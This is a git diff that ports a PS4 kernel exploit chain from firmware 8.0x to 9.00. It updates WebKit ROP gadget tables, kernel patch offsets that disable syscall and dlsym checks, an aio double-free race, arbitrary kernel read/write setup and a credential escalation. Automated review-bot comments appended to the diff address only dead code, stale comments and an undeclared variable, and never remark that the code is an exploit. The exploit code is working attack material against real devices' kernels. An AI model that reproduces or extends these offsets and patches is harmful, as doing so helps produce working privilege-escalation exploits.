diff --git a/kpatch/80x.d b/kpatch/80x.d deleted file mode 100644 index fc6d58d..0000000 --- a/kpatch/80x.d +++ /dev/null @@ -1 +0,0 @@ -80x.o 80x.d : 80x.c types.h utils.h diff --git a/kpatch/80x.c b/kpatch/900.c similarity index 97% rename from kpatch/80x.c rename to kpatch/900.c index 9f90996..bff4857 100644 --- a/kpatch/80x.c +++ b/kpatch/900.c @@ -73,7 +73,7 @@ void do_patch(void) { // // patch this to " = 0" instead // is_invalid_syscall = -1; // } - write32(kbase, 0x390, 0); + write32(kbase, 0x490, 0); // these code corresponds to the check that ensures that the caller's // instruction pointer is inside the libkernel library's memory range // @@ -115,7 +115,7 @@ void do_patch(void) { // vm_map_unlock(map); // return (KERN_PROTECTION_FAILURE); // } - write32(kbase, 0x00080B8B, 0); + write32(kbase, 0x80b8d, 0); // patch sys_dynlib_dlsym() to allow dynamic symbol resolution everywhere @@ -123,7 +123,7 @@ void do_patch(void) { // mov r14, qword [rbp - 0xad0] // cmp eax, 0x4000000 // jb ... ; patch jb to jmp - write8(kbase, 0x23B67F, 0xeb); + write8(kbase, 0x23b67f, 0xeb); // patch called function to always return 0 // // sys_dynlib_dlsym: @@ -168,7 +168,7 @@ void do_patch(void) { // .sy_narg = 6 write32(kbase, offset_sysent_11, 6); // .sy_call = gadgets['jmp qword ptr [rsi]'] - write64(kbase, offset_sysent_11 + 8, kbase + 0xe629c); + write64(kbase, offset_sysent_11 + 8, kbase + 0x4c7ad); // .sy_thrcnt = SY_THR_STATIC write32(kbase, offset_sysent_11 + 0x2c, 1); diff --git a/kpatch/900.d b/kpatch/900.d new file mode 100644 index 0000000..96d04e3 --- /dev/null +++ b/kpatch/900.d @@ -0,0 +1 @@ +900.o 900.d : 900.c types.h utils.h diff --git a/kpatch/80x.elf b/kpatch/900.elf similarity index 96% rename from kpatch/80x.elf rename to kpatch/900.elf index 6b76818..b7cb1f9 100644 Binary files a/kpatch/80x.elf and b/kpatch/900.elf differ 
diff --git a/kpatch/80x.o b/kpatch/900.o similarity index 86% rename from kpatch/80x.o rename to kpatch/900.o index 06b1b92..9fde2d4 100644 Binary files a/kpatch/80x.o and b/kpatch/900.o differ diff --git a/kpatch/Makefile b/kpatch/Makefile index c6cb539..59e406e 100644 --- a/kpatch/Makefile +++ b/kpatch/Makefile @@ -1,4 +1,4 @@ -TARGET = 80x +TARGET = 900 ENTRY = 0x900000000 src = $(TARGET).c diff --git a/rop/900.mjs b/rop/900.mjs index 790cf55..b6162c6 100644 --- a/rop/900.mjs +++ b/rop/900.mjs @@ -17,16 +17,13 @@ along with this program. If not, see . */ // by janisslsm (John) from ps4-dev discord -import * as config from '/config.mjs'; - import { Int } from '/module/int64.mjs'; -import { log, align, die } from '/module/utils.mjs'; -import { Addr, mem } from '/module/mem.mjs'; -import { KB, MB } from '/module/constants.mjs'; +import { log, die } from '/module/utils.mjs'; +import { mem } from '/module/mem.mjs'; +import { KB} from '/module/constants.mjs'; import { ChainBase } from '/module/chain.mjs'; import { - make_buffer, find_base, get_view_vector, resolve_import, @@ -34,7 +31,6 @@ import { } from '/module/memtools.mjs'; import * as rw from '/module/rw.mjs'; -import * as o from '/module/offset.mjs'; const origin = window.origin; const port = '8000'; @@ -42,9 +38,9 @@ const url = `${origin}:${port}`; const syscall_array = []; -const offset_func_exec = 0x18; +//const offset_func_exec = 0x18; const offset_textarea_impl = 0x18; -const offset_js_inline_prop = 0x10; +//const offset_js_inline_prop = 0x10; // WebKit offsets of imported functions const offset_wk_stack_chk_fail = 0x178; 
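Review bot: In the @@ -42 hunk of rop/900.mjs, `offset_func_exec` and `offset_js_inline_prop` are commented out instead of deleted, which leaves dead declarations that no linter will flag and that version control already preserves; if nothing references them any more, remove the two lines outright. The import rewrite in the @@ -17 hunk drops `config`, `align`, `Addr`, `MB`, `make_buffer` and the `o` namespace; I cannot see the rest of the module, so it is worth grepping for leftover uses, since a surviving reference would only surface as a ReferenceError when that line executes rather than at load time. Minor style nit in the same hunk: `import { KB} from '/module/constants.mjs';` is missing the space before `}`, unlike every neighbouring import.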
@@ -142,44 +138,34 @@ const jop5 = 'pop rsp; ret'; const rop_epilogue = 'leave; ret'; const webkit_gadget_offsets = new Map(Object.entries({ - 'pop rax; ret' : 0x0000000000051a12, - 'pop rbx; ret' : 0x00000000000be5d0, - 'pop rcx; ret' : 0x00000000000657b7, - 'pop rdx; ret' : 0x000000000000986c, + 'pop rax; ret' : 0x0000000000051a12, // `58 c3` + 'pop rbx; ret' : 0x00000000000be5d0, // `5b c3` + 'pop rcx; ret' : 0x00000000000657b7, // `59 c3` + 'pop rdx; ret' : 0x000000000000986c, // `5a c3` - 'pop rbp; ret' : 0x00000000000000b6, - 'pop rsi; ret' : 0x000000000001F4D6, - 'pop rdi; ret' : 0x0000000000319690, - 'pop rsp; ret' : 0x000000000004e293, + 'pop rbp; ret' : 0x00000000000000b6, // `5d c3` + 'pop rsi; ret' : 0x000000000001f4d6, // `5e c3` + 'pop rdi; ret' : 0x0000000000319690, // `5f c3` + 'pop rsp; ret' : 0x000000000004e293, // `5c c3` - 'pop r8; ret' : 0x00000000001a7ef1, - 'pop r9; ret' : 0x0000000000422571, - 'pop r10; ret' : 0x0000000000e9e1d1, - 'pop r11; ret' : 0x0000000000620df9, + 'pop r8; ret' : 0x00000000001a7ef1, // `47 58 c3` + 'pop r9; ret' : 0x0000000000422571, // `47 59 c3` + 'pop r10; ret' : 0x0000000000e9e1d1, // `47 5a c3` + 'pop r11; ret' : 0x00000000012b1d51, // `47 5b c3` - 'pop r12; ret' : 0x000000000085ec71, - 'pop r13; ret' : 0x00000000001da461, - 'pop r14; ret' : 0x000000000001f4d5, - 'pop r15; ret' : 0x000000000031968f, + 'pop r12; ret' : 0x000000000085ec71, // `47 5c c3` + 'pop r13; ret' : 0x00000000001da461, // `47 5d c3` + 'pop r14; ret' : 0x0000000000685d73, // `47 5e c3` + 'pop r15; ret' : 0x00000000006ab3aa, // `47 5f c3` - 'ret' : 0x0000000000000032, - 'leave; ret' : 0x000000000008db5b, + 'ret' : 0x0000000000000032, // `c3` + 'leave; ret' : 0x000000000008db5b, // `c9 c3` - 'neg rax; and rax, rcx; ret' : 0x00000000019771c4, - 'adc esi, esi; ret' : 0x000000000148874e, - 'add rax, rdx; ret' : 0x00000000003f662c, - 'push rsp; jmp qword ptr [rax]' : 0x0000000002bae87f, - 'add rcx, rsi; and rdx, rcx; or rax, rdx; ret' : 
0x0000000001b1ed66, - 'pop rsi; jmp qword ptr [rax + 0x1c]' : 0x00000000021fce7e, - - 'mov qword ptr [rdi], rsi; ret' : 0x0000000000040300, - 'mov rax, qword ptr [rax]; ret' : 0x00000000000241cc, - 'mov qword ptr [rdi], rax; ret' : 0x000000000000613b, - 'mov dword ptr [rdi], eax; ret' : 0x000000000000613c, - 'mov rdx, rcx; ret' : 0x000000000157fe71, - - 'mov dword ptr [rax], esi; ret' : 0x00000000005c3482, - 'mov dword ptr [rdi], eax; ret' : 0x000000000000613c, + 'mov rax, qword ptr [rax]; ret' : 0x00000000000241cc, // `48 8b 00 c3` + 'mov qword ptr [rdi], rax; ret' : 0x000000000000613b, // `48 89 07 c3` + 'mov dword ptr [rdi], eax; ret' : 0x000000000000613c, // `89 07 c3` + 'mov dword ptr [rax], esi; ret' : 0x00000000005c3482, // `89 30 c3` + [jop2] : 0x0000000000683800, [jop3] : 0x0000000000303906, @@ -192,13 +178,8 @@ const webkit_gadget_offsets = new Map(Object.entries({ })); const libc_gadget_offsets = new Map(Object.entries({ - 'neg rax; ret' : 0x00000000000d3f03, - 'mov rdx, rax; xor eax, eax; shl rdx, cl; ret' : 0x00000000000cefd9, - 'mov qword ptr [rsi], rcx; ret' : 0x00000000000cf982, - 'setjmp' : offset_libc_setjmp, - 'longjmp' : offset_libc_longjmp, - 'getcontext' : 0x24F04, - 'setcontext' : 0x638, + 'getcontext' : 0x24f04, + 'setcontext' : 0x29448, })); const libkernel_gadget_offsets = new Map(Object.entries({ @@ -451,7 +432,7 @@ class Chain900Base extends ChainBase { // Padding as longjmp() pushes the rdi and return address in the // jmp_buf at the target rsp. - this.push_constant(0); + //this.push_constant(0); this.push_constant(0); const target_rsp = this.stack_addr.add(this.position); diff --git a/scripts/lapse.mjs b/scripts/lapse.mjs index 0df2697..f61ed86 100644 --- a/scripts/lapse.mjs +++ b/scripts/lapse.mjs 
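Review bot: In the Chain900Base hunk (@@ -451), `//this.push_constant(0);` disables one of the two pushes, but the comment directly above it, `// Padding as longjmp() pushes the rdi and return address in the jmp_buf at the target rsp.`, still explains two padding slots, so the comment no longer matches the code. Either delete the disabled line and reword the comment to describe the single remaining slot, or restore both pushes; a commented-out statement beside a stale explanation is what the next reader will misread. The enclosing method starts before the hunk and continues after it, so I cannot see how `target_rsp` is consumed.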
@@ -706,9 +706,8 @@ function double_free_reqs2(sds) { aio_multi_poll(aio_ids_p, num_reqs); // drop the reference so that aio_multi_delete() will trigger _fdrop() - close(sd_client); - const res = race_one(req_addr, sd_conn, barrier, racer, sds); + //alert(res); racer.reset(); // MEMLEAK: if we won the race, aio_obj.ao_num_reqs got decremented @@ -717,6 +716,7 @@ function double_free_reqs2(sds) { close(sd_conn); if (res !== null) { + log(`won race at attempt: ${i}`); close(sd_listen); call_nze('pthread_barrier_destroy', barrier.addr); @@ -1243,13 +1243,13 @@ function make_kernel_arw(pktopts_sds, dirty_sd, k100_addr, kernel_addr, sds) { // TODO FW dependent parts! assume ps4 9.000 for now //TODO: Needs porting to 9.00 - const off_kstr = 0x7edcff; + const off_kstr = 0x7f6f27; const kbase = kernel_addr.sub(off_kstr); log(`kernel base: ${kbase}`); log('\nmaking arbitrary kernel read/write'); const cpuid = 7 - main_core; - const off_cpuid_to_pcpu = 0x228e6b0; + const off_cpuid_to_pcpu = 0x21ef2a0; const pcpu_p = kbase.add(off_cpuid_to_pcpu + cpuid*8); log(`cpuid_to_pcpu[${cpuid}]: ${pcpu_p}`); const pcpu = kread64(pcpu_p); @@ -1525,7 +1525,7 @@ async function patch_kernel(kbase, kmem, p_ucred, restore_info) { // cr_sceCaps[1] kmem.write64(p_ucred.add(0x68), -1); - const buf = await get_patches('/kpatch/80x.elf'); + const buf = await get_patches('/kpatch/900.elf'); // FIXME handle .bss segment properly // assume start of loadable segments is at offset 0x1000 const patches = new View1(await buf, 0x1000);
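Review bot: In the @@ -706 hunk, the comment `// drop the reference so that aio_multi_delete() will trigger _fdrop()` now has no statement under it, because the `close(sd_client);` it described was removed; either delete the comment or move it to wherever that close now happens, otherwise it documents code that no longer exists. The added `//alert(res);` is leftover debugging and should be dropped rather than committed commented out. double_free_reqs2 begins before this hunk and continues past it.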
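Review bot: In the @@ -717 hunk, the added `log()` call interpolates `${i}`, but `i` is not declared anywhere visible; unless it is the index of an enclosing loop earlier in double_free_reqs2 (outside my view), this line throws a ReferenceError precisely on the success path (`res !== null`), which the more common failure path never exercises. If the attempt counter does live in an outer loop, consider passing it in or naming it in a local near the call so the log line does not depend on an implicit outer variable. The function body extends beyond the hunk on both sides.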
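Review bot: In the @@ -1243 hunk, `off_kstr` and `off_cpuid_to_pcpu` are updated, but the two comments immediately above them, `// TODO FW dependent parts! assume ps4 9.000 for now` and `//TODO: Needs porting to 9.00`, are left untouched, so the second TODO now describes work this very commit performs. Drop the stale `//TODO: Needs porting to 9.00` line (or reword it to name whatever is still outstanding) and keep a single comment recording which firmware the constants belong to, since nothing else in make_kernel_arw records it. The function continues outside the hunk.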